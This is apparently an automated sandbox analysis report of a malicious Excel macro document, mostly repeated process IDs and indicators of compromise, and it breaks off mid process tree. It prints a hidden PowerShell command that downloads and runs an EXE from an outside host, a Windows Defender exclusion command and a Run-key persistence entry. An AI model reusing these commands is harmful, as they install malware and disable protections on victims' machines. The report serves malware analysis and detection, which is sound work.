LkAnJ.exe 1940 images.exe 2912 LkAnJ.exe 1940 images.exe 2912 LkAnJ.exe 1940 images.exe 2912 LkAnJ.exe 1940 images.exe 2940 LkAnJ.exe 1940 images.exe 1940 images.exe 3032 LkAnJ.exe 3032 LkAnJ.exe 1940 images.exe 3032 LkAnJ.exe 1940 images.exe 3032 LkAnJ.exe 1940 images.exe 3032 LkAnJ.exe 1940 images.exe 3032 LkAnJ.exe 1940 images.exe 3032 LkAnJ.exe 1940 images.exe 3032 LkAnJ.exe 1940 images.exe 3032 LkAnJ.exe 1940 images.exe 3032 LkAnJ.exe 1940 images.exe 3032 LkAnJ.exe 1940 images.exe 324 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 340 LkAnJ.exe 1940 images.exe 2132 LkAnJ.exe 1940 images.exe 1940 images.exe 2416 LkAnJ.exe 2416 LkAnJ.exe 1940 images.exe 2416 LkAnJ.exe 1940 images.exe 2416 LkAnJ.exe 1940 images.exe 2416 LkAnJ.exe 1940 images.exe 2416 LkAnJ.exe 1940 images.exe 2416 LkAnJ.exe 1940 images.exe 2416 LkAnJ.exe 1940 images.exe 2416 LkAnJ.exe 1940 images.exe 2416 LkAnJ.exe 1940 images.exe 2416 LkAnJ.exe 1940 images.exe 2416 LkAnJ.exe 1940 images.exe 668 LkAnJ.exe 1940 images.exe 1940 images.exe 2328 LkAnJ.exe 2328 LkAnJ.exe 1940 images.exe 2328 LkAnJ.exe 1940 images.exe 2328 LkAnJ.exe 1940 images.exe 2328 LkAnJ.exe 1940 images.exe 2328 LkAnJ.exe 1940 images.exe 2328 LkAnJ.exe 1940 images.exe 2328 LkAnJ.exe 1940 images.exe 2328 LkAnJ.exe 1940 images.exe 2328 LkAnJ.exe 1940 images.exe 2328 LkAnJ.exe 1940 images.exe 2328 LkAnJ.exe 1940 images.exe 2308 LkAnJ.exe 1940 images.exe 1940 images.exe 1940 images.exe 2440 LkAnJ.exe 2440 LkAnJ.exe 1940 images.exe 2440 LkAnJ.exe 1940 images.exe 2440 LkAnJ.exe 1940 images.exe 2440 LkAnJ.exe 1940 images.exe 2440 LkAnJ.exe 1940 images.exe 2440 LkAnJ.exe 1940 images.exe 2440 LkAnJ.exe 1940 images.exe 2440 LkAnJ.exe 1940 images.exe 2440 LkAnJ.exe 1940 images.exe 2440 LkAnJ.exe 1940 images.exe 2576 LkAnJ.exe 1940 images.exe 1940 images.exe 1940 images.exe 2608 LkAnJ.exe 2608 LkAnJ.exe 1940 images.exe 2608 LkAnJ.exe 1940 images.exe 2608 LkAnJ.exe 1940 images.exe 2608 LkAnJ.exe 1940 images.exe 2608 LkAnJ.exe 1940 images.exe 2608 LkAnJ.exe 1940 images.exe 2608 LkAnJ.exe 1940 images.exe 2608 LkAnJ.exe 1940 images.exe 2608 LkAnJ.exe 1940 images.exe 2608 LkAnJ.exe 1940 images.exe 1428 LkAnJ.exe 1940 images.exe 1940 images.exe 2884 LkAnJ.exe 2884 LkAnJ.exe 1940 images.exe 2884 LkAnJ.exe 1940 images.exe 2884 LkAnJ.exe 1940 images.exe 2884 LkAnJ.exe 1940 images.exe 2884 LkAnJ.exe 1940 images.exe 2884 LkAnJ.exe 1940 images.exe 2884 LkAnJ.exe 1940 images.exe 2884 LkAnJ.exe 1940 images.exe 2884 LkAnJ.exe 1940 images.exe 2884 LkAnJ.exe 1940 images.exe 2884 LkAnJ.exe 1940 images.exe 2788 LkAnJ.exe 1940 images.exe 2992 LkAnJ.exe 2992 LkAnJ.exe 1940 images.exe 2992 LkAnJ.exe 1940 images.exe 1940 images.exe 2992 LkAnJ.exe 2992 LkAnJ.exe 1940 images.exe 2992 LkAnJ.exe 1940 images.exe 2992 LkAnJ.exe 1940 images.exe 2992 LkAnJ.exe 1940 images.exe 2992 LkAnJ.exe 1940 images.exe 2992 LkAnJ.exe 1940 images.exe 2992 LkAnJ.exe 1940 images.exe 1940 images.exe 2992 LkAnJ.exe 1940 images.exe 2980 LkAnJ.exe 1940 images.exe 3068 LkAnJ.exe 3068 LkAnJ.exe 1940 images.exe 3068 LkAnJ.exe 1940 images.exe 3068 LkAnJ.exe 1940 images.exe 3068 LkAnJ.exe 1940 images.exe 3068 LkAnJ.exe 1940 images.exe 3068 LkAnJ.exe 1940 images.exe 3068 LkAnJ.exe 1940 images.exe 3068 LkAnJ.exe 1940 images.exe 3068 LkAnJ.exe 1940 images.exe 3068 LkAnJ.exe 1940 images.exe 3068 LkAnJ.exe 1940 images.exe 3056 LkAnJ.exe 1940 images.exe 2080 LkAnJ.exe 2080 LkAnJ.exe 2080 LkAnJ.exe 1940 images.exe 2080 LkAnJ.exe 1940 images.exe 1940 images.exe 2080 LkAnJ.exe 2080 LkAnJ.exe 1940 images.exe -
Executes dropped EXE 300 IoCs
pid Process 1312 LkAnJ.exe 1764 LkAnJ.exe 1352 LkAnJ.exe 1884 images.exe 1644 LkAnJ.exe 1656 images.exe 1940 images.exe 1960 LkAnJ.exe 1964 LkAnJ.exe 2044 LkAnJ.exe 1564 LkAnJ.exe 340 LkAnJ.exe 1056 LkAnJ.exe 1612 LkAnJ.exe 1520 LkAnJ.exe 1588 LkAnJ.exe 1576 LkAnJ.exe 1172 LkAnJ.exe 2044 LkAnJ.exe 512 LkAnJ.exe 1488 LkAnJ.exe 1696 LkAnJ.exe 1860 LkAnJ.exe 1132 LkAnJ.exe 1980 LkAnJ.exe 1936 LkAnJ.exe 1836 LkAnJ.exe 1816 LkAnJ.exe 2016 LkAnJ.exe 788 LkAnJ.exe 1184 LkAnJ.exe 1760 LkAnJ.exe 1056 LkAnJ.exe 1232 LkAnJ.exe 1256 LkAnJ.exe 1548 LkAnJ.exe 2040 LkAnJ.exe 1824 LkAnJ.exe 1908 LkAnJ.exe 1836 LkAnJ.exe 1816 LkAnJ.exe 1496 LkAnJ.exe 1680 LkAnJ.exe 1516 LkAnJ.exe 480 LkAnJ.exe 1252 LkAnJ.exe 1868 LkAnJ.exe 1412 LkAnJ.exe 1544 LkAnJ.exe 1976 LkAnJ.exe 1552 LkAnJ.exe 304 LkAnJ.exe 340 LkAnJ.exe 788 LkAnJ.exe 1768 LkAnJ.exe 1852 LkAnJ.exe 1724 LkAnJ.exe 1592 LkAnJ.exe 1256 LkAnJ.exe 2036 LkAnJ.exe 756 LkAnJ.exe 520 LkAnJ.exe 1836 LkAnJ.exe 1816 LkAnJ.exe 1760 LkAnJ.exe 1784 LkAnJ.exe 1516 LkAnJ.exe 1840 LkAnJ.exe 452 LkAnJ.exe 616 LkAnJ.exe 2016 LkAnJ.exe 1912 LkAnJ.exe 1052 LkAnJ.exe 2012 LkAnJ.exe 1760 LkAnJ.exe 1176 LkAnJ.exe 1576 LkAnJ.exe 452 LkAnJ.exe 784 LkAnJ.exe 1472 LkAnJ.exe 1228 LkAnJ.exe 1784 LkAnJ.exe 1528 LkAnJ.exe 1412 LkAnJ.exe 552 LkAnJ.exe 788 LkAnJ.exe 340 LkAnJ.exe 1616 LkAnJ.exe 1056 LkAnJ.exe 1772 LkAnJ.exe 1412 LkAnJ.exe 480 LkAnJ.exe 788 LkAnJ.exe 1844 LkAnJ.exe 676 LkAnJ.exe 2000 LkAnJ.exe 2020 LkAnJ.exe 480 LkAnJ.exe 1160 LkAnJ.exe 1856 LkAnJ.exe 1836 LkAnJ.exe 1632 LkAnJ.exe 1772 LkAnJ.exe 1764 LkAnJ.exe 340 LkAnJ.exe 2064 LkAnJ.exe 2104 LkAnJ.exe 2128 LkAnJ.exe 2156 LkAnJ.exe 2196 LkAnJ.exe 2220 LkAnJ.exe 2248 LkAnJ.exe 2288 LkAnJ.exe 2312 LkAnJ.exe 2436 LkAnJ.exe 2476 LkAnJ.exe 2500 LkAnJ.exe 2532 LkAnJ.exe 2572 LkAnJ.exe 2592 LkAnJ.exe 2632 LkAnJ.exe 2672 LkAnJ.exe 2696 LkAnJ.exe 2724 LkAnJ.exe 2764 LkAnJ.exe 2788 LkAnJ.exe 2816 LkAnJ.exe 2856 LkAnJ.exe 2876 LkAnJ.exe 2908 LkAnJ.exe 2948 LkAnJ.exe 2968 LkAnJ.exe 3000 LkAnJ.exe 3040 LkAnJ.exe 3064 LkAnJ.exe 324 LkAnJ.exe 520 LkAnJ.exe 2096 LkAnJ.exe 2148 LkAnJ.exe 2172 LkAnJ.exe 2160 LkAnJ.exe 2240 LkAnJ.exe 2264 LkAnJ.exe 2268 LkAnJ.exe 2292 LkAnJ.exe 2516 LkAnJ.exe 2440 LkAnJ.exe 2480 LkAnJ.exe 2536 LkAnJ.exe 2560 LkAnJ.exe 2592 LkAnJ.exe 2716 LkAnJ.exe 2732 LkAnJ.exe 392 LkAnJ.exe 2784 LkAnJ.exe 2764 LkAnJ.exe 2788 LkAnJ.exe 1852 LkAnJ.exe 2900 LkAnJ.exe 2860 LkAnJ.exe 2960 LkAnJ.exe 2992 LkAnJ.exe 2952 LkAnJ.exe 3032 LkAnJ.exe 576 LkAnJ.exe 3040 LkAnJ.exe 2144 LkAnJ.exe 2136 LkAnJ.exe 2056 LkAnJ.exe 2192 LkAnJ.exe 2128 LkAnJ.exe 2172 LkAnJ.exe 2284 LkAnJ.exe 2308 LkAnJ.exe 2268 LkAnJ.exe 2484 LkAnJ.exe 2516 LkAnJ.exe 2568 LkAnJ.exe 1800 LkAnJ.exe 2596 LkAnJ.exe 2560 LkAnJ.exe 2592 LkAnJ.exe 2720 LkAnJ.exe 2732 LkAnJ.exe 480 LkAnJ.exe 2784 LkAnJ.exe 2012 LkAnJ.exe 2836 LkAnJ.exe 2868 LkAnJ.exe 2876 LkAnJ.exe 2976 LkAnJ.exe 1664 LkAnJ.exe 2948 LkAnJ.exe 1216 LkAnJ.exe 576 LkAnJ.exe 2000 LkAnJ.exe 2140 LkAnJ.exe 2096 LkAnJ.exe 2232 LkAnJ.exe 1792 LkAnJ.exe 2152 LkAnJ.exe 2244 LkAnJ.exe 2296 LkAnJ.exe 2324 LkAnJ.exe 2504 LkAnJ.exe 1448 LkAnJ.exe 2516 LkAnJ.exe 2536 LkAnJ.exe 2608 LkAnJ.exe 2652 LkAnJ.exe 2760 LkAnJ.exe 2592 LkAnJ.exe 2808 LkAnJ.exe 2764 LkAnJ.exe 2824 LkAnJ.exe 2832 LkAnJ.exe 2848 LkAnJ.exe 1852 LkAnJ.exe 2964 LkAnJ.exe 1356 LkAnJ.exe 1664 LkAnJ.exe 3004 LkAnJ.exe 1836 LkAnJ.exe 576 LkAnJ.exe 2080 LkAnJ.exe 1584 LkAnJ.exe 2204 LkAnJ.exe 1688 LkAnJ.exe 1452 LkAnJ.exe 2216 LkAnJ.exe 2320 LkAnJ.exe 2440 LkAnJ.exe 2520 LkAnJ.exe 2588 LkAnJ.exe 2572 LkAnJ.exe 2536 LkAnJ.exe 2736 LkAnJ.exe 2708 LkAnJ.exe 2756 LkAnJ.exe 2720 LkAnJ.exe 1960 LkAnJ.exe 1876 LkAnJ.exe 2904 LkAnJ.exe 2944 LkAnJ.exe 2928 LkAnJ.exe 2964 LkAnJ.exe 3016 LkAnJ.exe 2052 LkAnJ.exe 1056 LkAnJ.exe 340 LkAnJ.exe 2020 LkAnJ.exe 820 LkAnJ.exe 816 LkAnJ.exe 1640 LkAnJ.exe 2184 LkAnJ.exe 2284 LkAnJ.exe 2468 LkAnJ.exe 2320 LkAnJ.exe 2316 LkAnJ.exe 2544 LkAnJ.exe 2588 LkAnJ.exe 1800 LkAnJ.exe 936 LkAnJ.exe 2736 LkAnJ.exe 1420 LkAnJ.exe 1148 LkAnJ.exe 2768 LkAnJ.exe 2824 LkAnJ.exe 2980 LkAnJ.exe 2912 LkAnJ.exe 2940 LkAnJ.exe 2972 LkAnJ.exe 3032 LkAnJ.exe 324 LkAnJ.exe 2096 LkAnJ.exe 340 LkAnJ.exe 2132 LkAnJ.exe 1568 LkAnJ.exe 2416 LkAnJ.exe 668 LkAnJ.exe 2252 LkAnJ.exe 2328 LkAnJ.exe 2308 LkAnJ.exe 1248 LkAnJ.exe 2440 LkAnJ.exe 2576 LkAnJ.exe 2556 LkAnJ.exe 2608 LkAnJ.exe 1428 LkAnJ.exe 2736 LkAnJ.exe 2884 LkAnJ.exe 2788 LkAnJ.exe 2904 LkAnJ.exe 2992 LkAnJ.exe 2980 LkAnJ.exe 3064 LkAnJ.exe 3068 LkAnJ.exe 3056 LkAnJ.exe 576 LkAnJ.exe 2080 LkAnJ.exe -
Suspicious use of SetThreadContext 100 IoCs
description pid Process procid_target PID 1312 set thread context of 1764 1312 LkAnJ.exe 30 PID 1884 set thread context of 1656 1884 images.exe 37 PID 1644 set thread context of 1960 1644 LkAnJ.exe 40 PID 2044 set thread context of 1564 2044 LkAnJ.exe 44 PID 1056 set thread context of 1612 1056 LkAnJ.exe 52 PID 1588 set thread context of 1576 1588 LkAnJ.exe 57 PID 2044 set thread context of 512 2044 LkAnJ.exe 61 PID 1696 set thread context of 1860 1696 LkAnJ.exe 65 PID 1980 set thread context of 1936 1980 LkAnJ.exe 70 PID 1816 set thread context of 2016 1816 LkAnJ.exe 74 PID 1184 set thread context of 1760 1184 LkAnJ.exe 78 PID 1232 set thread context of 1256 1232 LkAnJ.exe 82 PID 2040 set thread context of 1824 2040 LkAnJ.exe 86 PID 1836 set thread context of 1816 1836 LkAnJ.exe 90 PID 1680 set thread context of 1516 1680 LkAnJ.exe 94 PID 1252 set thread context of 1868 1252 LkAnJ.exe 98 PID 1544 set thread context of 1976 1544 LkAnJ.exe 102 PID 304 set thread context of 340 304 LkAnJ.exe 106 PID 1768 set thread context of 1852 1768 LkAnJ.exe 110 PID 1592 set thread context of 1256 1592 LkAnJ.exe 114 PID 756 set thread context of 520 756 LkAnJ.exe 118 PID 1816 set thread context of 1760 1816 LkAnJ.exe 122 PID 1516 set thread context of 1840 1516 LkAnJ.exe 126 PID 616 set thread context of 2016 616 LkAnJ.exe 130 PID 1052 set thread context of 2012 1052 LkAnJ.exe 134 PID 1176 set thread context of 1576 1176 LkAnJ.exe 138 PID 784 set thread context of 1472 784 LkAnJ.exe 142 PID 1784 set thread context of 1528 1784 LkAnJ.exe 146 PID 552 set thread context of 788 552 LkAnJ.exe 150 PID 1616 set thread context of 1056 1616 LkAnJ.exe 154 PID 1412 set thread context of 480 1412 LkAnJ.exe 158 PID 1844 set thread context of 676 1844 LkAnJ.exe 162 PID 2020 set thread context of 480 2020 LkAnJ.exe 166 PID 1856 set thread context of 1836 1856 LkAnJ.exe 170 PID 1772 set thread context of 1764 1772 LkAnJ.exe 174 PID 2064 set thread context of 2104 2064 LkAnJ.exe 178 PID 2156 set thread context of 2196 2156 LkAnJ.exe 182 PID 2248 set thread context of 2288 2248 LkAnJ.exe 186 PID 2436 set thread context of 2476 2436 LkAnJ.exe 192 PID 2532 set thread context of 2572 2532 LkAnJ.exe 196 PID 2632 set thread context of 2672 2632 LkAnJ.exe 200 PID 2724 set thread context of 2764 2724 LkAnJ.exe 204 PID 2816 set thread context of 2856 2816 LkAnJ.exe 208 PID 2908 set thread context of 2948 2908 LkAnJ.exe 212 PID 3000 set thread context of 3040 3000 LkAnJ.exe 216 PID 324 set thread context of 520 324 LkAnJ.exe 220 PID 2148 set thread context of 2172 2148 LkAnJ.exe 224 PID 2240 set thread context of 2264 2240 LkAnJ.exe 228 PID 2292 set thread context of 2516 2292 LkAnJ.exe 232 PID 2480 set thread context of 2536 2480 LkAnJ.exe 236 PID 2592 set thread context of 2716 2592 LkAnJ.exe 240 PID 392 set thread context of 2784 392 LkAnJ.exe 244 PID 2788 set thread context of 1852 2788 LkAnJ.exe 248 PID 2860 set thread context of 2960 2860 LkAnJ.exe 252 PID 2952 set thread context of 3032 2952 LkAnJ.exe 256 PID 3040 set thread context of 2144 3040 LkAnJ.exe 260 PID 2056 set thread context of 2192 2056 LkAnJ.exe 264 PID 2172 set thread context of 2284 2172 LkAnJ.exe 268 PID 2268 set thread context of 2484 2268 LkAnJ.exe 272 PID 2568 set thread context of 1800 2568 LkAnJ.exe 276 PID 2560 set thread context of 2592 2560 LkAnJ.exe 280 PID 2732 set thread context of 480 2732 LkAnJ.exe 284 PID 2012 set thread context of 2836 2012 LkAnJ.exe 288 PID 2876 set thread context of 2976 2876 LkAnJ.exe 292 PID 2948 set thread context of 1216 2948 LkAnJ.exe 296 PID 2000 set thread context of 2140 2000 LkAnJ.exe 300 PID 2232 set thread context of 1792 2232 LkAnJ.exe 304 PID 2244 set thread context of 2296 2244 LkAnJ.exe 308 PID 2504 set thread context of 1448 2504 LkAnJ.exe 312 PID 2536 set thread context of 2608 2536 LkAnJ.exe 316 PID 2760 set thread context of 2592 2760 LkAnJ.exe 320 PID 2764 set thread context of 2824 2764 LkAnJ.exe 324 PID 2848 set thread context of 1852 2848 LkAnJ.exe 328 PID 1356 set thread context of 1664 1356 LkAnJ.exe 332 PID 1836 set thread context of 576 1836 LkAnJ.exe 336 PID 1584 set thread context of 2204 1584 LkAnJ.exe 340 PID 1452 set thread context of 2216 1452 LkAnJ.exe 344 PID 2440 set thread context of 2520 2440 LkAnJ.exe 348 PID 2572 set thread context of 2536 2572 LkAnJ.exe 352 PID 2708 set thread context of 2756 2708 LkAnJ.exe 356 PID 1960 set thread context of 1876 1960 LkAnJ.exe 360 PID 2944 set thread context of 2928 2944 LkAnJ.exe 364 PID 3016 set thread context of 2052 3016 LkAnJ.exe 368 PID 340 set thread context of 2020 340 LkAnJ.exe 372 PID 816 set thread context of 1640 816 LkAnJ.exe 376 PID 2284 set thread context of 2468 2284 LkAnJ.exe 380 PID 2316 set thread context of 2544 2316 LkAnJ.exe 384 PID 1800 set thread context of 936 1800 LkAnJ.exe 388 PID 1420 set thread context of 1148 1420 LkAnJ.exe 392 PID 2824 set thread context of 2980 2824 LkAnJ.exe 396 PID 2940 set thread context of 2972 2940 LkAnJ.exe 400 PID 324 set thread context of 2096 324 LkAnJ.exe 404 PID 2132 set thread context of 1568 2132 LkAnJ.exe 408 PID 668 set thread context of 2252 668 LkAnJ.exe 412 PID 2308 set thread context of 1248 2308 LkAnJ.exe 416 PID 2576 set thread context of 2556 2576 LkAnJ.exe 420 PID 1428 set thread context of 2736 1428 LkAnJ.exe 424 PID 2788 set thread context of 2904 2788 LkAnJ.exe 428 PID 2980 set thread context of 3064 2980 LkAnJ.exe 432 PID 3056 set thread context of 576 3056 LkAnJ.exe 436 -
Suspicious behavior: LoadsDriver 5 IoCs
pid Process 1272 Process not Found 1272 Process not Found 1272 Process not Found 1272 Process not Found 1272 Process not Found -
JavaScript code in executable 1 IoCs
resource yara_rule behavioral1/files/0x00030000000131cb-690.dat js -
Sets DLL path for service in the registry 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Images = "C:\\ProgramData\\images.exe" LkAnJ.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 608 EXCEL.EXE 608 EXCEL.EXE 608 EXCEL.EXE 1656 images.exe -
Blacklisted process makes network request 1 IoCs
flow pid Process 5 792 powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Tax Challan.xlsm"1⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:608 -
C:\Windows\system32\cmd.execmd /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://jurec.mx/doc.exe',$env:Temp+'\LkAnJ.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\LkAnJ.exe')2⤵
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
PID:452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://jurec.mx/doc.exe',$env:Temp+'\LkAnJ.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\LkAnJ.exe')3⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:792 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"4⤵
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1312 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"5⤵
- Drops startup file
PID:1772
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"5⤵
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- NTFS ADS
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
PID:1764 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\6⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1840
-
-
C:\ProgramData\images.exe"C:\ProgramData\images.exe"6⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1884 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"7⤵PID:1580
-
-
C:\ProgramData\images.exe"C:\ProgramData\images.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies service
- Modifies WinLogon
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1656 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\8⤵
- Suspicious use of AdjustPrivilegeToken
PID:652
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe"8⤵PID:468
-
-
-
C:\ProgramData\images.exe"C:\ProgramData\images.exe" 2 1656 756917⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
PID:1940
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1764 733205⤵
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
PID:1352 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"6⤵
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1644 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"7⤵
- Drops startup file
PID:1896
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"7⤵
- Executes dropped EXE
PID:1960
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1960 759257⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
PID:1964 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"8⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2044 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"9⤵
- Drops startup file
PID:1472
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"9⤵
- Executes dropped EXE
PID:1564
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1564 773149⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
PID:340 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"10⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1056 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"11⤵
- Drops startup file
PID:792
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"11⤵
- Executes dropped EXE
PID:1612
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1612 7865511⤵
- Loads dropped DLL
- Executes dropped EXE
PID:1520 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"12⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1588 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"13⤵PID:1972
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"13⤵
- Executes dropped EXE
PID:1576
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1576 8035613⤵
- Loads dropped DLL
- Executes dropped EXE
PID:1172 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"14⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2044 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"15⤵PID:876
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"15⤵
- Executes dropped EXE
PID:512
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 512 8213415⤵
- Loads dropped DLL
- Executes dropped EXE
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"16⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1696 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"17⤵PID:1000
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"17⤵
- Executes dropped EXE
PID:1860
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1860 8346017⤵
- Loads dropped DLL
- Executes dropped EXE
PID:1132 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"18⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1980 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"19⤵PID:1192
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"19⤵
- Executes dropped EXE
PID:1936
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1936 8480219⤵
- Loads dropped DLL
- Executes dropped EXE
PID:1836 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"20⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1816 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"21⤵
- Drops startup file
PID:652
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"21⤵
- Executes dropped EXE
PID:2016
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2016 8619021⤵
- Loads dropped DLL
- Executes dropped EXE
PID:788 -
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"22⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1184 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"23⤵PID:512
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"23⤵
